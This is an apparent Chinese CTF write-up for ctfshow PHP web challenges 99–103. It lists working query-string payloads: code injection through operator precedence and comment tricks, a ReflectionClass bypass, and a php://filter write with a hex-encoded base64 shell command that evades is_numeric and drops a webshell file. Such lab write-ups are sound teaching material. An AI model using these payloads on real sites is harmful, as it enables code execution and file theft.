99.至少可以确定1在随机数中,可以输入1.php。(部分其他数也可以)
100.通过优先级:&& > = > and,使v1仅赋值数字通过。(?v1=1&v2=var_dump($ctfshow)/*&v3=*/; )
将一句话木马写入。
查看目录
找到flag目录并访问
101.利用反射类绕过(?v1=143&v2=echo new ReflectionClass&v3=;)
102.103.使用伪协议将v3用base64写入,
再使用十六进制{00(--读取位置为第二位)5044383959474e6864434171594473}既保证v2为数字又含e被认为为科学计数法绕过is_numeric。
(?v2=005044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=wuzheyu.php)
(v1=hex2bin)
传参后访问(wuzheyu.php)查看源码即可。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
